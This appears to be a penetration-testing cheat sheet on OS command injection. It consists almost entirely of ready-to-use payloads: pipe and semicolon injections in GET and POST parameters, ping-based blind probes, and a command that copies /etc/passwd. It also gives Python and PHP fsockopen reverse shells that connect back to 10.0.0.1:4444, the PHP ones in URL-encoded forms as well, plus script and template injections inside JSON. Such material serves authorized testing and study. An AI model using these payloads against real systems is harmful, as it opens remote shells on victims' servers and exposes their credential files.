OS Command Injection
Last modified: 2023-03-03
GET Requests
/api/cmd/whoami
/command/whoami
/?cmd=whoami
/?cmd=;id
/?cmd=ls
/?cmd=ls ..
/?cmd=ls ../
/?cmd=ls /home
POST Requests
We may be able to inject OS commands in POST data by adding pipes.
For example, we can inject system commands.
productId=1&stockId=1|whoami
productId=1&stockId=1|id
Ping
Try pinging to our local machine.
To confirm the result, start tcpdump in our local machine.
# -i: Interface e.g. eth0, tun0
sudo tcpdump -i eth0 icmp
Then execute ping command in POST request.
Below are examples for POST data.
file=example.jpg&filetype=png;ping+-c+1+10.0.0.1
Reverse Shell
file=example.jpg&filetype=png;export RHOST="10.0.0.1";export RPORT=4444;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
Blind Command Injection (Time Delay)
Use "ping" command to check if the website will be loaded with time delay.
name=michael&email=michael@example.com||ping+-c+10+127.0.0.1||&message=hello
email=test@test.com;ping+-c+15+127.0.0.1+#&message=hello
If we find the command can be executed, we can execute the other commands as below.
email=test@test.com;cp+/etc/passwd+./+#&message=hello
JSON Injection
{ "username": "\"; pwd \"" }
{"name":"<script>alert(1)</script>", "email":"victim@vulnerable.com"}
{"name": "admin", "content": "{{template: ./admin.php}}"}
PHP Injection
id=$(php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");')
# URL encode
id=1$(php%20-r%20'$sock=fsockopen(%2210.0.0.1%22,4444);exec(%22/bin/sh%20-i%20%3C&3%20%3E&3%202%3E&3%22);')
id=1$(php%20-r%20%27%24sock%3Dfsockopen%28%2210.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27)
id=1`php%20-r%20%27%24sock%3Dfsockopen%28%2210.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27`
